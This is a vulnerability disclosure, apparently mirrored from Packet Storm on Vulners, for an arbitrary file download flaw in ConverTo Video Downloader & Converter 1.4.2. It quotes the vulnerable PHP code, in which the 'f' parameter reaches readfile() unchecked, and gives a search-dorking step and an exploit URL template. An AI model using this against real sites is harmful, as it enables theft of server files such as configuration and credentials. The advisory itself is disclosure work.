Lucene search
K

ConverTo Video Downloader And Converter 1.4.2 File Download

🗓️ 02 Aug 2023 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 246 Views

ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability exploi

Code
`====================================================================================================================================  
| # Title : ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) |  
| # Vendor : https://codecanyon.net/item/converto-video-downloader-converter/13225966 |   
| # Dork : |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] infected file :download.php   
  
[+] line 12 readfile ($file); & line 5 $file = urldecode($_GET['f']);  
  
<?php   
if(isset($_GET['f'])){  
  
$siz = convertToBytes($_GET['sz']);  
$file = urldecode($_GET['f']);  
$rand = rand(0,5000);  
header("Content-Description: File Transfer");   
header("Content-Type: application/octet-stream");   
header('Content-Length: ' . $siz);  
header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4");   
ob_clean(); flush();  
readfile ($file);   
  
}  
  
[+] http://localhost/[PATH]/download.php?f= Ev!l  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation